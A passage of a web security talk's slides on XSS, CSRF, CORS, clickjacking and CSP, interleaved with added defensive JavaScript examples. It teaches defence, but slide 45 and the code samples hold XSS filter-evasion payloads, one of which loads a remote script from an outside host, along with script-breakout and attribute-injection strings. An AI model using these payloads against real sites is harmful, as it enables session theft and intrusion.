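The three "#!" handlers from slides 26, 28 and 30 as pure functions, plus an explicit same-origin check built on the URL parser. This is an added example, not Twitter's code; `SITE_ORIGIN` is an assumed value and the inputs are constructed from the slides.

```javascript
// Added example (not Twitter's code): the slide handlers without window.location,
// so the three approaches can be compared on the same inputs.
const SITE_ORIGIN = "https://twitter.com"; // assumed origin for this example

// Slide 26: replace() with a string pattern only touches the FIRST match,
// so a fragment with two colons keeps one of them.
function firstAttempt(fragment) {
  return fragment.replace(":", "");
}

// Slide 28: a global regex removes every ':', which stops "javascript:" but
// still lets a protocol-relative "//other-host/..." navigate off the site.
function secondAttempt(fragment) {
  return fragment.replace(/:/gi, "");
}

// Slide 30 works because assigning location.pathname can only change the path
// of the current origin. The same guarantee made explicit: resolve the fragment
// against the site origin and refuse anything that is not same-origin.
// Returns the path (plus query) to navigate to, or null to refuse.
function sameOriginPathOrNull(fragment) {
  let url;
  try {
    url = new URL(fragment, SITE_ORIGIN);
  } catch (e) {
    return null; // unparsable input is refused, not "cleaned"
  }
  // javascript: and data: URLs have an opaque origin ("null"); "//host/..."
  // resolves to that host's origin. Neither equals SITE_ORIGIN.
  if (url.origin !== SITE_ORIGIN) {
    return null;
  }
  return url.pathname + url.search;
}

// Constructed inputs: the intended use and the bypass attempts from the slides.
const SAMPLES = ["/framsia", "javascript:alert(1)", "javascript::alert(1)", "//example.org/x"];
for (const s of SAMPLES) {
  console.log(JSON.stringify(s), "->", JSON.stringify(sameOriginPathOrNull(s)));
}
```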
  • 31. HTML5 – Browser Storage
    – Persistent DOM based XSS
  • 32. Is it really all that dangerous?
  • 35. How do we stop it?
  • 36. The same origin policy
      <script>
      <iframe src="http://mail.google.com"></iframe>
  • 37. Is input validation enough?
    – How do you validate an email address?
      – [a-z]+@[a-z]+.[a-z]{2,3}
      – [a-z'-A-ZæøåÆØÅ.]+@[a-z0-9-.]+.[a-z]{2,3}
  • 38. From Wikipedia
    – The local-part of the email address may use any of these ASCII characters (RFC 5322 Section 3.2.3):
      – Uppercase and lowercase English letters (a–z, A–Z) (ASCII: 65-90, 97-122)
      – Digits 0 to 9 (ASCII: 48-57)
      – Characters !#$%&'*+-/=?^_`{|}~ (ASCII: 33, 35-39, 42, 43, 45, 47, 61, 63, 94-96, 123-126)
      – Character . (dot, period, full stop) provided that it is not the first or last character, and provided also that it does not appear two or more times consecutively (e.g. John..Doe@example.com)
      – Special characters are allowed with restrictions, including: space and "(),:;<>@[] (ASCII: 32, 34, 40, 41, 44, 58, 59, 60, 62, 64, 91-93)
  • 39. From Wikipedia
    – Valid email addresses:
      – niceandsimple@example.com
      – a.little.unusual@example.com
      – much."more unusual"@example.com
      – very.unusual."@".unusual.com@example.com
      – very."(),:;<>[]".VERY."very @"very".unusual@cool.example.com
  • 40. Input validation is not enough!
    – How would you avoid XSS on Stack Overflow?
    – Do you really expect the user to write HTML entities like &gt; and &lt;? User friendly?
  • 41. Contextual encoding
    – OWASP XSS Prevention cheat sheet:
      – Between HTML tags – HTML encoding &#nn;
      – In HTML attributes – HTML attribute encoding &#nn;
      – In JavaScript strings – JavaScript encoding \xnn
      – In CSS – CSS encoding \nnnnnn
      – In URLs – URL encoding %nn
  • 42. Contextual encoding is important!
      <html>
      <body>
      <script>
      var a = "</script><script>alert(1)</script>";
      </script>
      </body>
      </html>
  • 43. Simple HTML encoding is not enough
      <img class="profile" src="http://..." onmouseover="showUserProfile('bob&#39;); alert(&#39;1')">
  • 44. Allowing some HTML tags?
    – Use a well-tested whitelist based policy engine
      – Specify allowed tags and allowed attributes
      – Canonicalization
    – Suggestions: OWASP AntiSamy, HtmlPurifier
  • 45. Why you do NOT write your own HTML cleaner/sanitizer
      <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
      <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
      <BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")>
      <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">
      ¼script¾alert(¢XSS¢)¼/script¾
      <charset="x-mac-farsi">☼script ☾alert(1)//☼/script ☾
    – http://ha.ckers.org/xss.html
  • 46. jQuery Encoder
    – $.encoder.canonicalize()
    – $.encoder.encodeForCSS()
    – $.encoder.encodeForHTML()
    – $.encoder.encodeForHTMLAttribute()
    – $.encoder.encodeForJavaScript()
    – $.encoder.encodeForURL()
    – http://github.com/chrisisbeef/jquery-encoder
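Minimal encoders for three of the contexts on slide 41, applied to the two slide cases: a value inside a script string (slide 42) and a value inside a JavaScript string inside an HTML attribute (slide 43). This is an added example, not the jQuery Encoder library or the slides' own code; the functions, `scriptTagWithVar` and `profileImageTag`, are hypothetical helpers.

```javascript
// Added example (not jQuery Encoder, not the slides' code). Context-specific
// encoders and the two nesting cases from slides 42 and 43.
function encodeForHTML(s) {
  return String(s).replace(/[&<>"'\/]/g, c => "&#" + c.charCodeAt(0) + ";");
}

// Attribute context: encode everything except [A-Za-z0-9] so quotes, spaces
// and backslashes cannot end or alter the attribute value.
function encodeForHTMLAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, c => "&#x" + c.charCodeAt(0).toString(16) + ";");
}

// JavaScript string context: \xNN for one byte, \uNNNN otherwise. The HTML
// parser never sees a raw "</script>" because '<' is emitted as \x3c.
function encodeForJavaScript(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, c => {
    const code = c.charCodeAt(0);
    return code < 0x100 ? "\\x" + code.toString(16).padStart(2, "0")
                        : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// Slide 42: HTML-encoding a value placed inside a JS string would leave
// "</script>" intact; JavaScript encoding is the right layer here.
function scriptTagWithVar(value) {
  return '<script>var a = "' + encodeForJavaScript(value) + '";</script>';
}

// Slide 43: the value sits in a JS string literal inside an HTML attribute.
// Encode for the innermost context first (JS), then for the outer one (HTML
// attribute); the browser decodes in the reverse order.
function profileImageTag(userName) {
  const jsArg = encodeForJavaScript(userName);
  return '<img class="profile" src="http://..." onmouseover="showUserProfile(\'' +
    encodeForHTMLAttribute(jsArg) + '\')">';
}

// Constructed inputs: a plain name and the string from slide 43.
console.log(scriptTagWithVar("</script><script>alert(1)</script>"));
console.log(profileImageTag("bob"));
console.log(profileImageTag("bob'); alert('1"));
```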
  • 47. Avoiding DOM based XSS
    – Beware of potentially attacker controlled data: window.name, window.referer, window.location.hash, ++
  • 48. Coding principles
    – JSON from XHR should be JSON encoded – no HTML encoding
    – Beware of the semantics – jQuery:
      – Use $("...").text(value) instead of $("...").html(value)
      – Use .attr() to add attributes
      – Use .css() to modify CSS
    – URL-encode before putting data in URLs (encodeURI() and friends)
    – Never ever put user data inside:
      – eval(string) – are you sure that's JSON and not just JS?
      – setInterval(string, t)
      – setTimeout(string, t)
      – new Function(string)
  • 49. Coding principles
    – If you are using a templating engine like Mustache, check:
      – When is data escaped?
      – How is it escaped?
      – For what?
      – Test it!
  • 51. CSRF
    – Cross Site Request Forgery
    – One-click attack, session riding
  • 52. DEMO: CSRF demo (GET + POST)
  • 53. CSRF – Overview (browser, bank, infected server)
    – 1. Login (to the bank)
    – 2. Load content (from the infected server)
    – 3. Page with hidden script (returned by the infected server)
    – 4. Pay bill to attacker’s account (request sent to the bank)
  • 54. Stopping CSRF
    – Explicit verification before performing an action:
      – CAPTCHA
      – Re-authentication
      – One-time password before paying bills
  • 55. CSRF – Token (browser, bank, infected server)
    – 1. GET /pay
    – 2. 200 OK – <form...><input name="token" value="x123LKJ23">
    – 3. POST /pay – token=x123LKJ23
    – 4. 200 OK (bank: for session x, Token=x123LKJ23; x123LKJ23 == x123LKJ23)
  • 56. CSRF – Bad token (browser, bank, infected server)
    – 0. Login (to the bank)
    – 1. Load content (from the infected server)
    – 2. Page with hidden script and form: <form...><input name="token" value="XYZZ..."> 
    – 3. POST /pay – token=XYZZ...
    – 4. 400 Bad request (bank: for session x, Token=9992812jabc; 9992812jabc != XYZZ...)
  • 57. DEMO: CSRF Token protection demo
  • 58. Cross Domain Data
    – Proxy
    – JSONP
    – CORS
  • 59. Proxy
    – Client asks server
    – Server asks target
    – Target returns data to server
    – Server returns data to client
    – Allows server to inspect/reject data
    – Does not circumvent the Same Origin Policy
    – Cannot directly reuse current authentication
  • 60. JSONP
    – Page from server A adds a script tag pointing at target server B
    – Server B (hopefully) returns JSON data wrapped in a callback function: callback({"id":0, ...})
    – Page from server A defines a function with the same name as the callback function, and receives the data
    – Can leverage current authentication
    – Any web page can include the same script tag and the same callback and thus potentially steal the data
    – Server B can misbehave and send other types of JavaScript (XSS)
    – No easy way to protect POST requests from CSRF
    – => Insecurely circumventing the Same Origin Policy
  • 61. CORS – Cross Origin Resource Sharing
    – Standards-defined secure way to do cross domain requests from the browser
    – Types:
      – postMessage
      – Cross Domain XHR
  • 62. CORS – postMessage
    – Web page from server A includes a (hidden) iframe to target server B
    – JavaScript on the page from A invokes postMessage on the iframe:
        iframe.contentWindow.postMessage("some data", "http://serverB")
    – Page in the iframe from server B defines an event handler:
        $(window).bind("message", function(e) {
          var event = e.originalEvent;
          if (event.origin == "http://serverA") {
            // process event.data
          }
        });
  • 63. CORS – postMessage
    – Remember to check the origin of an event
    – Don't be tempted to specify "*" as the second parameter to postMessage
  • 64. Cross Domain XHR
      $.getJSON("http://serverB/someService", function(data) {
        // handle data
      });
    – Server B returns the data with a specific response header: Access-Control-Allow-Origin: http://serverA
    – Once again, do not use * as server name unless you want the data to be available to server
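Both channels on slides 62 to 64 come down to the same check: compare an origin string exactly against an allowlist, never "*". This added example (not the slides' code) models the B-side message handler, the A-side sender and server B's CORS header logic with plain objects so it runs outside a browser; `serverA`/`serverB` are the slides' placeholder names and `TRUSTED_ORIGINS` is an assumed allowlist.

```javascript
// Added example (not the slides' code): exact origin checks for postMessage
// and for the Access-Control-Allow-Origin response header.
const TRUSTED_ORIGINS = new Set(["http://serverA"]);

// Receiver side of postMessage (page on server B): only accept events whose
// origin is on the list. The handler returns what it did so it can be tested.
function makeMessageHandler(trusted, process) {
  return function onMessage(event) {
    // event.origin is filled in by the browser; the sender cannot choose it.
    if (!trusted.has(event.origin)) {
      return { accepted: false, reason: "untrusted origin " + event.origin };
    }
    return { accepted: true, result: process(event.data) };
  };
}

// Sender side (page on server A): pass the exact target origin as the second
// argument so the message is dropped if the iframe has navigated elsewhere.
function sendToFrame(frameWindow, data, targetOrigin) {
  if (targetOrigin === "*") throw new Error("refusing wildcard targetOrigin");
  frameWindow.postMessage(data, targetOrigin);
}

// Server B side of cross-domain XHR: echo the request's Origin header only
// when it is on the allowlist. Returning the requester's own origin (not "*")
// is what lets the browser hand the response to serverA and nobody else.
function corsHeadersFor(requestOrigin, trusted) {
  if (requestOrigin === undefined || !trusted.has(requestOrigin)) {
    return {}; // no ACAO header: the browser withholds the response from the page
  }
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Vary": "Origin", // caches must not reuse this response for other origins
  };
}

// Constructed events, shaped like those a browser delivers to the B-side handler.
const handler = makeMessageHandler(TRUSTED_ORIGINS, d => d.toUpperCase());
console.log(handler({ origin: "http://serverA", data: "some data" }));
console.log(handler({ origin: "http://other.example", data: "some data" }));
console.log(corsHeadersFor("http://serverA", TRUSTED_ORIGINS));
```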
  • 65. DEMO: CORS demo (XHR + postMessage)
  • 66. Important regardless of choice
    – Agree on the type of encoding – prefer JSON with no other encoding
    – Remember – if you allow HTML, you open for XSS
  • 67. DEMO: Video of XSS via Twitter feed
  • 68. Clickjacking
    – User does not click on what he/she thinks
    – Hidden iframe
    – Like-jacking
  • 71. Advanced clickjacking
    – Exploiting drag-n-drop to steal content
    – User drags a ball into a basket – in reality selects text and drops it in a textarea
  • 72. Anti-clickjacking
    – JavaScript framebusting
    – Response header:
        X-Frame-Options: sameorigin
        X-Frame-Options: deny
    – JavaScript framebusting can be circumvented
    – X-Frame-Options is only supported in newer browsers – IE8 was the first one
    – IE also supports X-Frame-Options: allow-from <domains>
  • 74. EcmaScript 5 – defineProperty
      Object.defineProperty(object, propertyName, {
        get: function() { ... },
        set: function(value) { ... },
        configurable: boolean
      })
  • 75. DEMO: Blocking calls to document.cookie from JS
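The slide-75 demo reduces to Object.defineProperty with a non-configurable accessor, as on slide 74. This is an added example, not the slides' demo code; a plain object stands in for `document` so it runs outside a browser, and `lockCookieProperty`/`canRedefine` are hypothetical helper names.

```javascript
// Added example (not the slides' demo): shadow the cookie property with an
// accessor that returns nothing, ignores writes, logs each attempt, and cannot
// be redefined afterwards.
function lockCookieProperty(doc, log) {
  let attempts = 0;
  Object.defineProperty(doc, "cookie", {
    get: function () {
      attempts += 1;
      log("blocked read of document.cookie");
      return "";                // scripts see no cookies at all
    },
    set: function (value) {
      attempts += 1;
      log("blocked write of document.cookie: " + value);
    },
    configurable: false,        // a later defineProperty or delete cannot undo it
    enumerable: true,
  });
  return () => attempts;        // lets monitoring code ask how often something tried
}

// Whether a later script can replace the property (true for an ordinary
// assignment-based override, false after lockCookieProperty).
function canRedefine(doc) {
  try {
    Object.defineProperty(doc, "cookie", { value: "x", configurable: true });
    return true;
  } catch (e) {
    return false; // TypeError: cannot redefine a non-configurable property
  }
}

// Constructed stand-in for the browser document.
const fakeDocument = { cookie: "session=abc123" };
const messages = [];
const attemptCount = lockCookieProperty(fakeDocument, m => messages.push(m));

fakeDocument.cookie = "stolen=1";                  // silently ignored and logged
console.log(JSON.stringify(fakeDocument.cookie));  // ""
console.log("attempts:", attemptCount(), messages);
console.log("redefinable:", canRedefine(fakeDocument)); // false
```

In a browser, defining the property on `document` shadows the accessor inherited from its prototype; only scripts that run after this one are affected, so it must load first.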
  • 76. HTML5 – SVG
    – http://www.owasp.org/images/a/aa/The_image_that_called_me.pdf
    – Scalable Vector Graphics
      – Image format
      – Allows for scripting
      – XML-based
      – Can be declared inline – <html>...<div>...<svg>...
    – Countless XSS bugs in browser implementations
  • 77. SVG favicon
    – SVG favicon overlaying the chrome of Opera (picture by Mario Heiderich @0x6D6172696F)
  • 78. Content Security Policy
    – Mozilla CSP – Content Security Policy
    – Now a W3C standard
    – Header based – server instructs browser
    – Policies for JavaScript, frames, images, style etc.
        X-Content-Security-Policy: allow *; script-src 'self'
        X-Content-Security-Policy: allow *; script-src 'self' *.google.com https://*.nordea.no:443
        X-Content-Security-Policy: allow *; script-src 'self'; options inline-script eval-script
    – https://wiki.mozilla.org/Security/CSP/Spec
  • 79. Content Security Policy
    – First version came in Firefox 4 – FF7 and FF8 beta ~80% compliant with current W3C spec
    – Implemented in Chrome – completely broken in Chrome 15, ~95% compliant in beta (16)
    – By default disables JavaScript functions that build code from strings: eval(s), setTimeout(s,t), setInterval(s,t), new Function(s)
    – Can (in the future) be used for clickjacking defence: frame-ancestors uri
  • 81. Other HTML5 features
    – Check html5sec.org
    – Test tool: http://html5sec.org/innerhtml
  • 83. Questions – Erlend Oftedal, erlend.oftedal@bekk.no, @webtonull
    – People you should follow:
      – @0x6D6172696F – HTML5 security
      – @johnwilander – RIA security
      – @wisecwisec – DOM based XSS
      – @garethheyes – XSS
      – @kkotowicz – Clickjacking

Editor's Notes

  1. simple firebug/tamperdata bypass
  2. Reflected XSS – search field on www.insecurelabs.org
  3. Stored XSS - qwitter
  4. DOM-based XSS – qwitter – searchfield
  5. BEEF
  6. DOMinator
  7. CSRF Token protection
  8. CORS
  9. Not Twitter's fault
  10. Anti-clickjacking